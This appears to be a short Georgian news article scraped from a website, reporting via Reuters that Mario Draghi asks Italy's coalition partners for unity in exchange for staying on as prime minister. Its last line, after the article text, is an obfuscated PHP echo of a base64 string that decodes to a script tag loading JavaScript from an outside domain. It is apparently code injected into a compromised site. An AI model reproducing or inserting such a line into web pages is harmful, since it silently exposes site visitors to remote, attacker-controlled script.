celsiusi
ავერსი საქკაბელი
იტალიის პრემიერმინისტრი მარიო დრაგი თანამდებობაზე დარჩენის სანაცვლოდ, კოალიციური პარტნიორებისგან ერთიანობას ითხოვს, - ამის შესახებ ინფორმაციას Reuters ავრცელებს.
 
გამოცემის ცნობით, დრაგიმ ის საკითხები და გამოწვევები წარადგინა, რომლებიც ამჟამად იტალიის წინაშეა. მათ შორის სოციალური უთანასწორობა, მზარდი ფასები და უკრაინაში მიმდინარე ომი. დრაგი ასევე პოლიტიკური პარტიებისგან მხარდაჭერას მოითხოვს.
 
ცნობისთვის, დრაგიმ თანამდებობა 14 ივლისს დატოვა, მიზეზი სამთავრობო კოალიციაში შემავალი პარტიის "ხუთი ვარსკვლავის" მიერ პარლამენტში გამართულ კენჭისყრაზე მთავრობისთვის ნდობის არ გამოცხადება იყო, თუმცა იტალიის პრეზიდენტმა სერჯო მატარელამ პრემიერმინისტრ მარიო დრაგის გადადგომის მოთხოვნა არ დააკმაყოფილა.
492
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");